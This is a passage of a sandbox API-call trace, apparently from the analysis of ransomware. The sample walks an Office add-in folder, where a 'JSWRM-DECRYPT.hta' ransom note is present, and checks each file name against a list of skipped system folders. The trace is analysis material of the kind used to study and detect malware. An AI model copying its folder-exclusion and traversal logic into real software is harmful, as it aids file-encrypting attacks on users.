out: hHeap=0x1e0000) returned 1 [0124.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0124.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0124.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0124.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0124.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0124.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0124.448] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\lt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\lt\\jswrm-decrypt.hta")) returned 0x20 [0124.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0124.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0124.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0124.448] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\lt\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7b529d9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x152a6704, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40d5d656, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231ec0 [0124.449] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.449] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7b529d9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x152a6704, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40d5d656, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.449] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.449] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.449] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb6089d0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb6089d0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x152f2ade, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc42c8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.449] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.449] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.449] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.449] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.449] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.449] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.449] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.449] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.449] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.449] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0124.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0124.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240f48, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0124.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0124.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241358, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0124.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0124.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0124.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0124.449] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40d5d656, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40d5d656, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40d5d656, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.449] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.450] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.450] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.450] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.450] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.450] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.450] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.450] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.450] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.450] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0124.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0124.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0124.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0124.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0124.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0124.450] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5101cbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5101cbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11ac0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.450] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.450] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.450] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.450] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.450] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.450] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.450] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.450] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.450] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.450] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0124.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0124.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0124.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0124.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d298, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0124.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0124.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0124.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0124.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.451] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9992797, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9992797, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9992797, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.451] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.451] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.451] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.451] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.451] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.451] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.451] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.451] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.451] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.451] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0124.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0124.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0124.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0124.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0124.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0124.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f848 [0124.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0124.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0124.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0124.452] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7b78b8d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7b78b8d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7b9ee02, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4918, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.452] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.452] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.452] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.452] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.452] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.452] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0124.452] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.452] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.452] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0124.452] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0124.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0124.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0124.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0124.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0124.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f280 [0124.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0124.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0124.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.452] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x152a6704, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x152a6704, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15bbd5ad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f98b, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.lt.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.452] lstrcmpiW (lpString1="PowerViewRes.lt.xap", lpString2=".") returned 1 [0124.452] lstrcmpiW (lpString1="PowerViewRes.lt.xap", lpString2="..") returned 1 [0124.452] lstrcmpiW (lpString1="PowerViewRes.lt.xap", lpString2="...") returned 1 [0124.453] lstrcmpiW (lpString1="PowerViewRes.lt.xap", lpString2="windows") returned -1 [0124.453] lstrcmpiW (lpString1="PowerViewRes.lt.xap", lpString2="recovery") returned -1 [0124.453] lstrcmpiW (lpString1="PowerViewRes.lt.xap", lpString2="perflogs") returned 1 [0124.453] lstrcmpiW (lpString1="PowerViewRes.lt.xap", lpString2="documents and settings") returned 1 [0124.453] lstrcmpiW (lpString1="PowerViewRes.lt.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.453] lstrcmpiW (lpString1="PowerViewRes.lt.xap", lpString2="system volume information") returned -1 [0124.453] lstrcmpiW (lpString1="PowerViewRes.lt.xap", lpString2="msocache") returned 1 [0124.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.lt.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0124.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.lt.xap", cchWideChar=19, lpMultiByteStr=0x241010, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.lt.xap", lpUsedDefaultChar=0x0) returned 19 [0124.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.lt.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0124.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.lt.xap", cchWideChar=19, lpMultiByteStr=0x240f70, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.lt.xap", lpUsedDefaultChar=0x0) returned 19 [0124.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.453] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0124.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0124.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) 